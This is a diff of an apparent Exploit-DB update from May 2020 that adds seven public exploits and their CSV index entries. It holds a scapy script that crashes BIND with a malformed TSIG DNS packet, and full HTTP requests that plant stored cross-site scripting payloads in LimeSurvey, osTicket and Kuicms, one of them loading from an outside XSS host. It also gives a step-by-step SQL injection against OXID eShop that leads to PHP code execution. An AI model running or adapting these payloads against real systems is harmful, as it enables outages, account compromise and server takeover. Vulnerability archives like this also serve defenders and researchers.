DB: 2020-05-28

7 changes to exploits/shellcodes

BIND - 'TSIG' Denial of Service
Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting
LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting
osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting
osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting
Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting
OXID eShop 6.3.4 - 'sorting' SQL Injection

exploits/multiple/dos/48521.py

@@ -0,0 +1,11 @@
+#!/usr/bin/python
+#coding:utf-8
+
+from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT
+
+tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16)
+
+dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)
+answer = sr1(dns_req, verbose=0)
+
+print(answer[DNS].summary())

exploits/php/webapps/48522.txt

@@ -0,0 +1,72 @@
+Exploit Title: Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-05-26
+# Exploit Author: that faceless coder(Inveteck Global)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: Online Marriage Registration System 1.0 - Stored Cross-Site Scripting
+# Tested on: MAC OS MOJAVE v 10.14.6
+# CVE : N/A
+
+The Online Marriage Registration System suffers from multiple stored cross-site script vulnerabilities: 
+
+if(isset($_POST['submit']))
+  {
+  
+$nofhusband=$_POST['nofhusband'];
+$hreligion=$_POST['hreligion'];
+$haddress=$_POST['haddress'];
+$hstate=$_POST['hstate'];
+
+$nofwife=$_POST['nofwife'];
+$wreligion=$_POST['wreligion'];
+$waddress=$_POST['waddress'];
+$wstate=$_POST['wstate'];
+$witnessnamef=$_POST['witnessnamef'];
+$waddressfirst=$_POST['waddressfirst'];
+$witnessnames=$_POST['witnessnames'];
+$waddresssec=$_POST['waddresssec'];
+$witnessnamet=$_POST['witnessnamet'];
+$waddressthird=$_POST['waddressthird'];
+
+$sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)";
+$query=$dbh->prepare($sql);
+
+$sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)";
+$query=$dbh->prepare($sql);
+$query->bindParam(':nofhusband',$nofhusband,PDO::PARAM_STR);
+$query->bindParam(':hreligion',$hreligion,PDO::PARAM_STR);
+$query->bindParam(':hdob',$hdob,PDO::PARAM_STR);
+$query->bindParam(':hsbmarriage',$hsbmarriage,PDO::PARAM_STR);
+$query->bindParam(':haddress',$haddress,PDO::PARAM_STR);
+$query->bindParam(':hzipcode',$hzipcode,PDO::PARAM_STR);
+$query->bindParam(':hstate',$hstate,PDO::PARAM_STR);
+$query->bindParam(':hadharno',$hadharno,PDO::PARAM_STR);
+$query->bindParam(':nofwife',$nofwife,PDO::PARAM_STR);
+$query->bindParam(':wifeimg',$wifeimg,PDO::PARAM_STR);
+$query->bindParam(':wreligion',$wreligion,PDO::PARAM_STR);
+$query->bindParam(':wdob',$wdob,PDO::PARAM_STR);
+$query->bindParam(':wsbmarriage',$wsbmarriage,PDO::PARAM_STR);
+$query->bindParam(':waddress',$waddress,PDO::PARAM_STR);
+$query->bindParam(':wzipcode',$wzipcode,PDO::PARAM_STR);
+$query->bindParam(':wstate',$wstate,PDO::PARAM_STR);
+$query->bindParam(':wadharno',$wadharno,PDO::PARAM_STR);
+$query->bindParam(':witnessnamef',$witnessnamef,PDO::PARAM_STR);
+$query->bindParam(':waddressfirst',$waddressfirst,PDO::PARAM_STR);
+$query->bindParam(':witnessnames',$witnessnames,PDO::PARAM_STR);
+$query->bindParam(':waddresssec',$waddresssec,PDO::PARAM_STR);
+$query->bindParam(':witnessnamet',$witnessnamet,PDO::PARAM_STR);
+$query->bindParam(':waddressthird',$waddressthird,PDO::PARAM_STR);
+ $query->execute();
+
+   $LastInsertId=$dbh->lastInsertId();
+   if ($LastInsertId>0) {
+
+echo '<script>alert("Registration form has been filled successfully.")</script>';
+  }
+  else
+    {
+         echo '<script>alert("Something Went Wrong. Please try again")</script>';
+    }
+
+The data gets stored through the mentioned vulnerable parameters into the database. There is no filtering when those values are printed when the web application fetches the data from the database

exploits/php/webapps/48523.txt

@@ -0,0 +1,33 @@
+# Exploit Title: LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting 
+# Date: 05/26/2020
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.limesurvey.org
+# Version: LimeSurvey 4.1.11+200316
+# Tested on: Ubuntu 18.04.4
+# Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/2aada33c76efbbc35d33c149ac02b1dc16a81f62
+
+
+# Vulnerability Details
+Description : A stored cross-site scripting vulnerability exists within the "Permission Roles" functionality of the LimeSurvey administration panel.
+Vulnerable Parameters : Permissiontemplates[name], Permissiontemplates[description]
+
+
+# POC
+# Exploit Details : The following request will create a permission role with an XSS payload as the role name and description.  
+
+
+POST /limesurvey/index.php/admin/roles/sa/applyedit HTTP/1.1
+Host: TARGET
+Content-Length: 443
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://TARGET
+Referer: http://TARGET/limesurvey/index.php/admin/roles
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D; LS-ERXSBPYJOOGIGFYW=m4qshhf7m76ifsm6k0v1vq084h
+Connection: close
+
+YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D&Permissiontemplates%5Bptid%5D=&Permissiontemplates%5Bname%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Bdescription%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Brenewed_last%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_at%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_by%5D=1

exploits/php/webapps/48524.txt

@@ -0,0 +1,34 @@
+# Exploit Title: osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting
+# Date: 2020-05-26
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://osticket.com 
+# Patch Link: https://github.com/osTicket/osTicket/commit/6c724ea3fe352d10d457d334dc054ef81917fde1
+# Version: osTicket 1.14.1 
+# Tested on: CentOS 7 (1908)
+
+
+# Vulnerability Details
+# Description :  A persistent cross-site scripting vulnerability exists within the 'Ticket Queue' functionality of osTicket.  
+# Vulnerable Parameter : queue-name 
+
+
+# POC
+# Exploit Details : The following request will create a ticket queue with an XSS payload as the queue name.
+
+
+POST /os-ticket/scp/queues.php? HTTP/1.1
+Host: TARGET
+Content-Length: 4491
+Cache-Control: max-age=0
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://TARGET/os-ticket/scp/queues.php?
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: OSTSESSID=0c1ssokv9npgmlolue4utj3l81
+Connection: close
+
+__CSRFToken__=849ba29024f9d9a894b82fafe29437ace2edc4fa&do=create&a=add&id=&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&parent_id=0&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&250f895b1cb39a=&_field-checkboxes%5B%5D=1545030345&21128ea1697b9a%5B%5D=includes&c88a27abe7cfab%5B%5D=1&8c6a793c80594e%5B%5D=includes&27ca5f383385cb%5B%5D=includes&82094a76afc304%5B%5D=assigned&85d9edefffa2af%5B%5D=set&a504e6f17eb29c%5B%5D=set&0cc4d080a6f9c7=&3bf29b1e29f88a=&cdf4550c8c6152=&6fd24fee5b5572=&fc1676be53debd=&8097e50092c904=&6691443ad8db48%5B%5D=&a34b4283149a9c=&14e270255589aa%5B%5D=d&f5c5cacb5af509=&197e4e922ff97d%5B%5D=d&046798c3e2934b=&35fedfb3380450%5B%5D=d&0358d35fd35b18=&6e8cc954821ab8%5B%5D=d&e8d808c9daa716%5B%5D=set&ba9c3701fead0c=&d5eed7d2b6f6d6=&42861e6193e58b=&5c39f4b522d7bc=&2008591c98253e=&d37db1b3627ff7=&24fb32de6f1bb7%5B%5D=&6759a92723004c=&bad7322c569428%5B%5D=d&ed195f6bb72ac4=&dded6ab7ae5f7d%5B%5D=d&2f075fa6f1d982=&608f0a963cf3ee%5B%5D=d&1a29ab5444d543=&df9d61f18b866b%5B%5D=d&d72deaa7c372fc%5B%5D=set&76bf3342e88075=&7a259ed4ddda1b=&bb46d89a671337=&4a459564d07f4d=&8f724bccb10aa8=&cb91e9d8492749=&5b783534587f6a%5B%5D=&68dc79a3890bef=&1f25af8e5603df%5B%5D=d&28959e91fd9838=&204683549219a5%5B%5D=d&0a68d064cd567a=&d4b3a0b1aea1b8%5B%5D=d&90c9e78164a9d4=&e4b53638ab9b55%5B%5D=d&new-field=&filter=&sort_id=&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Number&columns%5B1%5D%5Bwidth%5D=85&columns%5B1%5D%5Bsortable%5D=on&columns%5B2%5D%5Bcolumn_id%5D=2&columns%5B2%5D%5Bheading%5D=Created&columns%5B2%5D%5Bwidth%5D=120&columns%5B2%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=250&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=150&columns%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=120&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assignee&columns%5B8%5D%5Bwidth%5D=100&columns%5B8%5D%5Bsortable%5D=on&exports%5Bnumber%5D%5Bname%5D=Ticket+Number&exports%5Bnumber%5D%5Bheading%5D=Ticket+Number&exports%5Bcreated%5D%5Bname%5D=Date+Created&exports%5Bcreated%5D%5Bheading%5D=Date+Created&exports%5Bcdata__subject%5D%5Bname%5D=Subject&exports%5Bcdata__subject%5D%5Bheading%5D=Subject&exports%5Buser__name%5D%5Bname%5D=From&exports%5Buser__name%5D%5Bheading%5D=From&exports%5Buser__emails__address%5D%5Bname%5D=From+Email&exports%5Buser__emails__address%5D%5Bheading%5D=From+Email&exports%5Bcdata__priority%5D%5Bname%5D=Priority&exports%5Bcdata__priority%5D%5Bheading%5D=Priority&exports%5Bdept_id%5D%5Bname%5D=Department&exports%5Bdept_id%5D%5Bheading%5D=Department&exports%5Btopic_id%5D%5Bname%5D=Help+Topic&exports%5Btopic_id%5D%5Bheading%5D=Help+Topic&exports%5Bsource%5D%5Bname%5D=Source&exports%5Bsource%5D%5Bheading%5D=Source&exports%5Bstatus__id%5D%5Bname%5D=Current+Status&exports%5Bstatus__id%5D%5Bheading%5D=Current+Status&exports%5Blastupdate%5D%5Bname%5D=Last+Updated&exports%5Blastupdate%5D%5Bheading%5D=Last+Updated&exports%5Best_duedate%5D%5Bname%5D=SLA+Due+Date&exports%5Best_duedate%5D%5Bheading%5D=SLA+Due+Date&exports%5Bduedate%5D%5Bname%5D=Due+Date&exports%5Bduedate%5D%5Bheading%5D=Due+Date&exports%5Bclosed%5D%5Bname%5D=Closed+Date&exports%5Bclosed%5D%5Bheading%5D=Closed+Date&exports%5Bisoverdue%5D%5Bname%5D=Overdue&exports%5Bisoverdue%5D%5Bheading%5D=Overdue&exports%5Bmerged%5D%5Bname%5D=Merged&exports%5Bmerged%5D%5Bheading%5D=Merged&exports%5Blinked%5D%5Bname%5D=Linked&exports%5Blinked%5D%5Bheading%5D=Linked&exports%5Bisanswered%5D%5Bname%5D=Answered&exports%5Bisanswered%5D%5Bheading%5D=Answered&exports%5Bstaff_id%5D%5Bname%5D=Agent+Assigned&exports%5Bstaff_id%5D%5Bheading%5D=Agent+Assigned&exports%5Bteam_id%5D%5Bname%5D=Team+Assigned&exports%5Bteam_id%5D%5Bheading%5D=Team+Assigned&exports%5Bthread_count%5D%5Bname%5D=Thread+Count&exports%5Bthread_count%5D%5Bheading%5D=Thread+Count&exports%5Breopen_count%5D%5Bname%5D=Reopen+Count&exports%5Breopen_count%5D%5Bheading%5D=Reopen+Count&exports%5Battachment_count%5D%5Bname%5D=Attachment+Count&exports%5Battachment_count%5D%5Bheading%5D=Attachment+Count&exports%5Btask_count%5D%5Bname%5D=Task+Count&exports%5Btask_count%5D%5Bheading%5D=Task+Count&new-field=&submit=Create

exploits/php/webapps/48525.txt

@@ -0,0 +1,34 @@
+# Exploit Title: osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting
+# Date: 2020-06-26
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://osticket.com 
+# Patch Link: https://github.com/osTicket/osTicket/commit/d54cca0b265128f119b6c398575175cb10cf1754
+# Version: osTicket 1.14.1 
+# Tested on: CentOS 7 (1908)
+
+
+# Vulnerability Details
+# Description :  A persistent cross-site scripting vulnerability exists within the 'Saved Searches' functionality of osTicket.  
+# Vulnerable Parameter : queue-name 
+
+
+# POC
+# Exploit Details : The following request will create a personal queue with an XSS payload as the queue name.  
+
+
+POST /os-ticket/scp/ajax.php/tickets/search/save HTTP/1.1
+Host: TARGET
+Content-Length: 2407
+Accept: */*
+X-CSRFToken: 4c0cfe1d90018bd1521d4c6236ff9e695695feb4
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://TARGET
+Referer: http://TARGET/os-ticket/scp/tickets.php?queue=1
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: OSTSESSID=1bgg4patkgh75amtk7i40ijg0r
+Connection: close
+
+id=&parent_id=1&a=search&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&6e726d7c5d6739=&bb1ed81f8d0d5b%5B%5D=includes&_field-checkboxes%5B%5D=1248906005&5a14e85b6ad733%5B%5D=includes&64e882412ea044%5B%5D=open&3387e761db951b%5B%5D=includes&fae2c0ad94312b%5B%5D=assigned&8b25367208a92c%5B%5D=set&4548de579d61b2%5B%5D=set&6b0942ccd352fb=&7508c012d200c3=&306afd69a94f37=&2cb42ece11fe18=&19178654ae1019=&5446ab541e9cbe=&643b959c89a939%5B%5D=&c41f997e500bde=&594ae09ae9b23b%5B%5D=d&f67d51537548ed=&782f1a2f64f6b8%5B%5D=d&bf54f7c4c9cd85=&d53f6d5fa7c165%5B%5D=d&dda4c3a3983e11=&3edd5b8c560cb0%5B%5D=d&5d54602e649846%5B%5D=set&eee448b2f6bd17=&c66cc8358c9461=&1c2df7cbee73a8=&2b12655056e4bc=&559ec54e5d4f4d=&4d653aa4c6fbfe=&fde625f821b1cc%5B%5D=&1d3ec7f5059a1e=&fd5c9e3beeb866%5B%5D=d&f9d70eb7b32ef7=&4e236864d83b1b%5B%5D=d&6ad52c19a211f8=&17d6ed14edc097%5B%5D=d&1ed604fc8adb80=&29187a3432e23b%5B%5D=d&6a2107ce7bc3ad%5B%5D=set&968398f30ae34d=&1bd5961978d6f5=&aaead453b69fd8=&b2473437455577=&2d7ade2446d29d=&7248fe732f4071=&9d29b71605e863%5B%5D=&606b27533da5da=&042dae34bbf5f6%5B%5D=d&69e461f3457905=&9cb82bf3b3b655%5B%5D=d&472a67a44bfd63=&387c6a57919904%5B%5D=d&b13a3742f14f6a=&285dc00ac07d30%5B%5D=d&new-field=&inherit-columns=on&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Ticket&columns%5B1%5D%5Bwidth%5D=100&columns%5B1%5D%5Bname%5D=Ticket+%23&columns%5B1%5D%5Bsortable%5D=on&columns%5B10%5D%5Bcolumn_id%5D=10&columns%5B10%5D%5Bheading%5D=Last+Updated&columns%5B10%5D%5Bwidth%5D=150&columns%5B10%5D%5Bname%5D=Last+Updated&columns%5B10%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=300&columns%5B3%5D%5Bname%5D=Subject&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=185&columns%5B4%5D%5Bname%5D=User+Name&columns%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=85&columns%5B5%5D%5Bname%5D=Priority&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assigned+To&columns%5B8%5D%5Bwidth%5D=160&columns%5B8%5D%5Bname%5D=Assignee&columns%5B8%5D%5Bsortable%5D=on&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E

exploits/php/webapps/48526.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Kuicms Php EE 2.0 - Persistent Cross-Site Scripting
+# Date: 2020-05-27
+# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
+# Vendor Homepage: https://kuicms.com
+# Software Link: https://kuicms.com/kuicms.zip
+# Version: Kuicms Php EE 2.0
+# Tested on: Windows
+# CVE : N/A
+
+Vulnerable Request:
+POST /web/?c=bbs&a=reply&id=1 HTTP/1.1
+Host: 172.16.166.137
+Content-Length: 56
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://172.16.166.137
+Referer: http://172.16.166.137/web/?m=bbsshow&id=1
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=vpj3jduhoqlfieqhcnlilck2s6
+Connection: close
+
+content=</div>test<img src=//xsshs.cn/8jhh/xss.jpg><div>

exploits/php/webapps/48527.txt

@@ -0,0 +1,41 @@
+# Exploit Title: OXID eShop 6.3.4 - 'sorting' SQL Injection
+# Date: 2019-07-29
+# Exploit Author: VulnSpy
+# Vendor Homepage: https://www.oxid-esales.com/
+# Software Link: https://github.com/OXID-eSales/oxideshop_ce
+# Version: Versions 6.x (prior to 6.3.4)
+# Tested on: https://github.com/vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc
+# CVE:
+
+1. Click on any product item in the web page
+
+```bash
+e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html
+```
+
+2..Add `sorting` parameter after the URL of item detail ( Insert PHP code
+to database via SQL injection )
+
+```bash
+e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert
+into
+oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)
+
+VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1,
+0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
+1, 0x76756c6e73707964656d6f,
+0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d,
+0x434d53464f4c4445525f55534552494e464f, 0x00);%23
+```
+
+3.Accessing the following links triggers PHP code execution and will
+display the PHPINFO page if exploited successfully.
+
+```bash
+http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo
+```
+
+Ref:
+* https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
+* https://blog.ripstech.com/2019/oxid-esales-shop-software/
+* https://bugs.oxid-esales.com/view.php?id=7002

files_exploits.csv

@@ -6736,6 +6736,7 @@ id,file,description,date,author,type,platform,port
 48501,exploits/windows/dos/48501.txt,"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
 48502,exploits/windows/dos/48502.py,"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
 48503,exploits/windows/dos/48503.py,"Filetto 1.0 - 'FEAT' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
+48521,exploits/multiple/dos/48521.py,"BIND - 'TSIG' Denial of Service",2020-05-20,"Teppei Fukuda",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42748,3 +42749,9 @@ id,file,description,date,author,type,platform,port
 48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php,
 48519,exploits/linux/webapps/48519.py,"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)",2020-05-26,Photubias,webapps,linux,
 48520,exploits/php/webapps/48520.txt,"WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution",2020-05-26,"Austin Martin",webapps,php,
+48522,exploits/php/webapps/48522.txt,"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting",2020-05-27,"that faceless coder",webapps,php,
+48523,exploits/php/webapps/48523.txt,"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php,
+48524,exploits/php/webapps/48524.txt,"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php,
+48525,exploits/php/webapps/48525.txt,"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php,
+48526,exploits/php/webapps/48526.txt,"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting",2020-05-27,"China Banking and Insurance Information Technology Management Co.",webapps,php,
+48527,exploits/php/webapps/48527.txt,"OXID eShop 6.3.4 - 'sorting' SQL Injection",2020-05-27,VulnSpy,webapps,php,